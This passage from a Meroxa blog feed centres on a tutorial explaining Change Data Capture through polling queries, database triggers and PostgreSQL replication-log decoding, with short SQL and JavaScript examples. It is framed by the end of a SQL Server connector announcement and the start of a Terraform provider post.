&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa resource create mysqlserver \--type sqlserver \--url &quot;sqlserver://$MSSQL_USER:$MSSQL_PASS@$MSSQL_URL:$MSSQL_PORT/$MSSQL_DB&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see&lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Microsoft SQL Server Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The&lt;/em&gt; SQL Server&lt;em&gt;connector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to&lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Join our&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Stream Your Database Changes with Change Data Capture: Part One]]></title><description><![CDATA[Change Data Capture (CDC) is an efficient and scalable model that simplifies the implementation of real-time systems.]]></description><link>https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-one</link><guid isPermaLink="false">https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-one</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 11 Aug 2021 20:18:00 GMT</pubDate><content:encoded>&lt;p&gt;Nobody wants to look at a dashboard or make decisions with yesterday’s data. We live in a world where real-time information is a first-class expectation for our users and is critical to make the best decisions inside an organization.&lt;/p&gt;
&lt;p&gt;Change Data Capture (CDC) is an efficient and scalable model that simplifies the implementation of real-time systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*O-S32djKgEuSCxO1vqayUA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Change Data Capture Diagram&lt;/p&gt;
&lt;p&gt;Industry-leading companies like&lt;a href=&quot;https://shopify.engineering/capturing-every-change-shopify-sharded-monolith&quot;&gt;Shopify&lt;/a&gt;,&lt;a href=&quot;https://www.capitalone.com/tech/software-engineering/batch-to-real-time-with-change-data-capture/&quot;&gt;Capital One&lt;/a&gt;,&lt;a href=&quot;https://netflixtechblog.com/dblog-a-generic-change-data-capture-framework-69351fb9099b&quot;&gt;Netflix&lt;/a&gt;,&lt;a href=&quot;https://medium.com/airbnb-engineering/capturing-data-evolution-in-a-service-oriented-architecture-72f7c643ee6f&quot;&gt;Airbnb&lt;/a&gt;, and&lt;a href=&quot;https://medium.com/zendesk-engineering/add-some-smarts-to-your-change-data-capture-2296032ad042&quot;&gt;Zendesk&lt;/a&gt;, have all published technical articles demonstrating how they have implemented Change Data Capture (CDC) into their data architectures to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Expose data from a centralized system to event-driven microservices.&lt;/li&gt;
&lt;li&gt;Build applications that respond to data events in real-time.&lt;/li&gt;
&lt;li&gt;Maintain data quality and freshness within data warehouses and other downstream consumers of data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this multi-part series on Change Data Capture, we are going to dive into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is Change Data Capture, and how are CDC systems implemented?&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-two&quot;&gt;What are the ideal CDC use cases, and how to get started with CDC?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s begin.&lt;/p&gt;
&lt;h3&gt;What is Change Data Capture (CDC)?&lt;/h3&gt;
&lt;p&gt;The idea of “tracking the changes to a system” isn’t new. Engineers have been writing scripts to query and update data in batches since the idea of programming itself came about. Change Data Capture is a formalization of the various methods that determine&lt;strong&gt;how changes are tracked.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;At its core, CDC is a process that allows an application to listen for changes to a data store and respond to those events. The process involves a data store (database, data warehouse, etc.) and a system to capture the changes of the data store.&lt;/p&gt;
&lt;p&gt;For example, one could:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Capture&lt;a href=&quot;https://www.postgresql.org/&quot;&gt;PostgreSQL&lt;/a&gt; (database) changes and send the change events to&lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Kafka&lt;/a&gt; using&lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt; (CDC).&lt;/li&gt;
&lt;li&gt;Capture changes from&lt;a href=&quot;https://kafka.apache.org/&quot;&gt;MySQL&lt;/a&gt; (database) and&lt;code class=&quot;language-text&quot;&gt;POST&lt;/code&gt; to an HTTP Endpoint with&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; (CDC).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Real-World Example&lt;/h3&gt;
&lt;p&gt;Let’s look at a real-world example that would benefit from CDC. Here, we have an example of a table in PostgreSQL:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*iTaK9Q0UbDKGYr4gP0UcVw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Example User Data&lt;/p&gt;
&lt;p&gt;When information in the&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table changes, the business may need to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Update the data warehouse, which is the source of truth for business analytics.&lt;/li&gt;
&lt;li&gt;Notify the team of a new user.&lt;/li&gt;
&lt;li&gt;Keep an additional&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table in sync with filtered columns for privacy purposes.&lt;/li&gt;
&lt;li&gt;Create a real-time dashboard of new user activity.&lt;/li&gt;
&lt;li&gt;Capture change events for audit logging.&lt;/li&gt;
&lt;li&gt;Store every change in a cloud bucket for historical analytics.&lt;/li&gt;
&lt;li&gt;Update an index used for search.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can build services to perform all of the actions above by acting on a data change event, and if desired, build and manage them independently of each other.&lt;/p&gt;
&lt;p&gt;CDC gives us efficiency by acting on events as they occur and scalability by leveraging a&lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;decoupled event-driven architecture&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;A CDC Event Example&lt;/h3&gt;
&lt;p&gt;CDC systems will usually emit an event that contains details about the change that occurred. When using a CDC system like Debezium and a new user is created, here is the generated event:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ExWEPx4LY3Pjfi6fEUsUYA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Anatomy of CDC Event&lt;/p&gt;
&lt;p&gt;This event describes the schema of the data (&lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt;), the operation that occurred (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;), and the data before and after&lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The event’s format, the fidelity of information, and when it is delivered depend on the CDC system’s implementation.&lt;/p&gt;
&lt;h3&gt;CDC Implementations&lt;/h3&gt;
&lt;p&gt;Tracking changes to a PostgreSQL database could look very similar or wildly different to tracking changes within MongoDB. It all depends on the environment and the capture method chosen.&lt;/p&gt;
&lt;p&gt;The capture method chosen can define:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what operation(s) (insert, update, delete) can be captured.&lt;/li&gt;
&lt;li&gt;how the event is formatted.&lt;/li&gt;
&lt;li&gt;If the CDC system is&lt;em&gt;pulling&lt;/em&gt; the change events or being&lt;em&gt;pushed&lt;/em&gt; to the CDC system.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s look at each of the different methods and discuss some of the pros and cons of each.&lt;/p&gt;
&lt;h3&gt;Polling&lt;/h3&gt;
&lt;p&gt;When implementing any database connector, the decision starts with “&lt;a href=&quot;https://cnr.sh/essays/build-kafka-connector-source&quot;&gt;To poll or not to poll&lt;/a&gt;.” Polling is the most conceptually simple CDC method. To implement polling, you need to query the datastore on an interval.&lt;/p&gt;
&lt;p&gt;For example, you may run the following query on an interval:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This&lt;code class=&quot;language-text&quot;&gt;SELECT *&lt;/code&gt; query would be considered the&lt;strong&gt;bulk&lt;/strong&gt; (&quot;give me everything&quot;) polling method. While this would be great to capture a snapshot of the current state, downstream consumers would require work to figure out exactly what data changed on each interval.&lt;/p&gt;
&lt;p&gt;However, polling can get much more granular. For example, it’s possible to poll only for a primary key:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;MAX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A system can track the max value of a primary key (&lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt;). When the max value increments, this means that an&lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation occurred.&lt;/p&gt;
&lt;p&gt;Additionally, if a database has an&lt;code class=&quot;language-text&quot;&gt;updateAt&lt;/code&gt; column, a query can look at timestamp changes to capture&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operations.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users &lt;span class=&quot;token keyword&quot;&gt;WHERE&lt;/span&gt; updated_at &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2021&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;02&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;08&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easy:&lt;/strong&gt; Polling is great because it’s simple to implement, deploy, and very effective.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Custom queries are useful&lt;/strong&gt;: One advantage is that the query used while polling can be customized to fit complex use cases. The query could include&lt;code class=&quot;language-text&quot;&gt;JOINS&lt;/code&gt; or transformations performed directly in SQL.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Capturing deletes is hard:&lt;/strong&gt; With the polling method, it’s much harder to capture&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations. You can&apos;t really query a row in a database if it&apos;s gone entirely. One solution is to use&lt;a href=&quot;https://dev.to/anaptfox/creating-a-soft-delete-archive-table-with-postgresql-38pi&quot;&gt;database triggers to create an &quot;archive&quot; table of deleted records&lt;/a&gt;. Then, delete operations become insert operations of a new table that could be polled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Events are pulled, not pushed&lt;/strong&gt;: With polling, the event is pulled from the upstream system. For example, when using polling to ingest into a data warehouse, the ingestion would happen when the CDC system decides to poll. In theory, “real-time” can be accomplished with fast enough polling, but this could cause performance overhead to the database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance overhead is a concern&lt;/strong&gt;: A&lt;code class=&quot;language-text&quot;&gt;SELECT *&lt;/code&gt; or any complex query doesn&apos;t scale very well on massive datasets. One common workaround is by polling a stand-by instance instead of the primary database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Changes between query times can’t be captured&lt;/strong&gt;: Another consideration is the data changes between query times. For example, if a system polls every hour and the data changes multiple times within that same hour, you’d only be able to see the change at query times, not any of the intermediate changes.&lt;/p&gt;
&lt;h3&gt;Database Triggers&lt;/h3&gt;
&lt;p&gt;Most of the popular databases support triggers of some sort. For example,&lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createtrigger.html&quot;&gt;in PostgreSQL&lt;/a&gt;, one can build a trigger that will move a row to a new table when it’s deleted:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token constant&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;TRIGGER&lt;/span&gt; moveDeleted
&lt;span class=&quot;token constant&quot;&gt;BEFORE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
&lt;span class=&quot;token constant&quot;&gt;FOR&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;EACH&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;ROW&lt;/span&gt;
&lt;span class=&quot;token constant&quot;&gt;EXECUTE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;PROCEDURE&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;moveDeleted&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Because triggers can effectively listen to an operation and perform an action, database triggers can act as a CDC system.&lt;/p&gt;
&lt;p&gt;In some cases, these triggers can be very complex and full-blown functions. For example,&lt;a href=&quot;https://docs.mongodb.com/realm/triggers/&quot;&gt;in MongoDB&lt;/a&gt;, Triggers are written in Javascript:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token function-variable function&quot;&gt;exports&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;changeEvent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Destructure out fields from the change stream event object&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateDescription&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fullDocument &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; changeEvent&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Check if the shippingLocation field was updated&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; updatedFields &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Object&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;keys&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;updateDescription&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;updatedFields&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; isNewLocation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; updatedFields&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;some&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;field&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt;
  	field&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;match&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;shippingLocation&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// If the location changed, text the customer the updated location.&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;isNewLocation&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Do something&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ease of deployment&lt;/strong&gt;: Triggers are awesome because they are supported out-the-box for most databases and are easy to implement.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data Consistency:&lt;/strong&gt; Any current and new downstream consumer doesn’t have to worry about performing this logic because the logic is contained in the database and not the application — in the case of a microservice architecture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application logic in databases could be bad&lt;/strong&gt;: However, databases should not contain&lt;em&gt;too&lt;/em&gt; much application logic. This could result in behavior being too tightly coupled to the database, and one bad trigger could affect an entire data infrastructure. Triggers should be concise and simple.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Every operation is captured&lt;/strong&gt;: You can build a trigger for each database operation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance overhead is a concern: P&lt;/strong&gt;oorly written Triggers can also impact database performance for the same reasons as the polling method. A trigger that contained a complex query wouldn’t scale very well on massive datasets.&lt;/p&gt;
&lt;h3&gt;Streaming Replication Logs&lt;/h3&gt;
&lt;p&gt;It’s best to have at least a secondary instance of a database running to ensure proper failover and disaster recovery.&lt;/p&gt;
&lt;p&gt;In this model, the standby instances of the database need to stay up-to-date with the primary in real-time&lt;em&gt;and&lt;/em&gt; not lose information. The best way to do this today is for the database to write every change occurring to a log. Then, any standby instances can stream the changes from this log and apply the operations locally. Performing the same operations in real-time is what allows the standby instances to “mirror” the primary.&lt;/p&gt;
&lt;p&gt;Here are some references on how this works for some of the most popular databases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/docs/9.0/wal-intro.html&quot;&gt;PostgreSQL’s Write-Ahead Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.mongodb.com/manual/core/replica-set-oplog/&quot;&gt;MongoDB’s Oplog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CDC can use the same mechanism to listen to changes. Just like a standby database, an additional system can also process the streaming log as it’s updated:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*uYynjkjIRECH8S5laORpbw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the PostgreSQL example diagram above, a CDC system can act as an additional&lt;a href=&quot;https://www.postgresql.org/docs/9.6/runtime-config-replication.html&quot;&gt;WAL Receiver&lt;/a&gt;, process the event, and send to a message transport (HTTP API, Kafka, etc.).&lt;/p&gt;
&lt;p&gt;Here is an example of querying changes from PostgreSQL’s WAL using a SQL function provided by the the&lt;code class=&quot;language-text&quot;&gt;[test\_decoding](https://www.postgresql.org/docs/10/logicaldecoding-example.html)&lt;/code&gt;&lt;a href=&quot;https://www.postgresql.org/docs/10/logicaldecoding-example.html&quot;&gt;plugin&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;postgres=# SELECT * FROM pg_logical_slot_get_changes(&apos;regression_slot&apos;, NULL, NULL); 
lsn | xid | data 
-----------+-------+--------------------------------------------------------- 
0/BA5A688 | 10298 | BEGIN 10298 
0/BA5A6F0 | 10298 | table public.data: INSERT: id[integer]:1 data[text]:&apos;1&apos; 
0/BA5A7F8 | 10298 | table public.data: INSERT: id[integer]:2 data[text]:&apos;2&apos; 
0/BA5A8A8 | 10298 | COMMIT 10298 
(4 rows)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the query response above, it describes the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;lsn&lt;/code&gt; - Log Sequence Number (LSN) - This number describes the current position in the WAL log. It&apos;s used by downstream systems when the log has been updated.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;xid&lt;/code&gt; - Transaction ID - Each transaction to PostgreSQL gets a unique ID.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;data&lt;/code&gt; - Data about action and operation that occurred.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The format of these change events will be determined based on the&lt;a href=&quot;https://wiki.postgresql.org/wiki/Logical_Decoding_Plugins&quot;&gt;Logical Decoding Output Plugin&lt;/a&gt;. For example, the&lt;a href=&quot;https://github.com/eulerto/wal2json&quot;&gt;wal2json&lt;/a&gt; output plugin allows you to output the changes in JSON, which are easier to parse than the&lt;code class=&quot;language-text&quot;&gt;test_decoding&lt;/code&gt; plugin output.&lt;/p&gt;
&lt;p&gt;PostgreSQL also provides a mechanism to&lt;a href=&quot;https://www.postgresql.org/docs/10/logicaldecoding-walsender.html&quot;&gt;stream these changes&lt;/a&gt; as they occur. As you saw in the event example earlier, Debezium also parses the streaming log in real-time and produces a JSON event.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Events are pushed&lt;/strong&gt;: One huge benefit of streaming logs is that the events are being pushed to the CDC system as changes occur (vs. polling). This pushing model allows for real-time architectures. Using the&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table as an example, the data warehouse ingestion would happen in real-time with a streaming log CDC system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Efficient and Low Latency&lt;/strong&gt;: Standby instances use streaming logs for disaster recovery, where efficiency and low latency are top priorities. Streaming replication logs is the most efficient means of capturing changes with the least overhead to the database. This process will look differently from database to database, but the concepts still hold.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Every operation is captured&lt;/strong&gt;: Every transaction occurring to the data store will be written to the log.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hard to get a complete snapshot of data&lt;/strong&gt;: Generally, after a certain amount of time (or size), the streaming logs get purged because they take up space. Being so, the logs may not contain&lt;em&gt;every&lt;/em&gt; change that occurred, just the most recent.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Need to be configured&lt;/strong&gt;: Enabling replication logs may require additional configuration, plugins, or even database restart. Performing these changes with minimal downtown could be cumbersome and requires planning.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Capturing the&lt;em&gt;changes&lt;/em&gt; of data is like a swiss army knife for any application architecture; it is useful for so many different types of problems. Listening, storing, and acting on the changes of any system — particularly a database — allows you to perform real-time replication data between two data stores, break up a monolithic application into scalable, event-driven microservices, or even power real-time UIs.&lt;/p&gt;
&lt;p&gt;Streaming replication logs, polling, and database triggers provide a mechanism to build a CDC system. Each has its own set of pros and cons specific to your application architecture and desired functionality.&lt;/p&gt;
&lt;p&gt;In the&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-two&quot;&gt;next article in this series&lt;/a&gt;, we are going to dive into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What are the ideal CDC use cases?&lt;/li&gt;
&lt;li&gt;Where can I get started with CDC?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;Special thanks to&lt;a href=&quot;https://twitter.com/criccomini&quot;&gt;@criccomini&lt;/a&gt;,&lt;a href=&quot;https://twitter.com/andyhattemer&quot;&gt;@andyhattemer&lt;/a&gt;,&lt;a href=&quot;https://twitter.com/misosoup&quot;&gt;@misosoup&lt;/a&gt;,&lt;a href=&quot;https://twitter.com/devarispbrown&quot;&gt;@devarispbrown&lt;/a&gt;, and&lt;a href=&quot;https://twitter.com/neovintage&quot;&gt;@neovintage&lt;/a&gt; for helping me craft the ideas in this article!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Pipelines as Code with the Meroxa Terraform Provider]]></title><description><![CDATA[With the Meroxa CLI and the Meroxa Dashboard, your pipelines are streaming, real-time, and up and running in minutes, not months.]]></description><link>https://meroxa.com/blog/real-time-pipelines-as-code-with-the-meroxa-terraform-provider</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-pipelines-as-code-with-the-meroxa-terraform-provider</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 06 Aug 2021 15:29:00 GMT</pubDate><content:encoded>&lt;p&gt;Making production-ready pipelines still requires a significant amount of time and effort. With the Meroxa CLI and the Meroxa Dashboard, your pipelines are streaming, real-time, and up and running in minutes, not months. Today, we’re adding a new way for you to build pipelines with versioning, speed, and consistency.&lt;/p&gt;
&lt;p&gt;Introducing the Meroxa Terraform Provider. 🎉&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/560/1*Hi_PN-jtbSRsKtiiLYdgFg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The provider allows you to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provision, modify and destroy various objects on the Meroxa platform as code.&lt;/li&gt;
&lt;li&gt;Easily share pipelines with your team.&lt;/li&gt;
&lt;li&gt;Manage pipelines next to infrastructure managed with Terraform.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you’re new to &lt;a href=&quot;https://www.terraform.io/&quot;&gt;Terraform&lt;/a&gt;, it is an open-source infrastructure as code software tool that provides a workflow and tooling to manage cloud infrastructure. Using the &lt;a href=&quot;https://www.terraform.io/docs/language/providers/index.html&quot;&gt;Terraform Provider&lt;/a&gt;, you can add your data pipeline resources to the list of items that Terraform can manage. For more information, check out the &lt;a href=&quot;https://learn.hashicorp.com/terraform&quot;&gt;Terraform Getting Started Guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
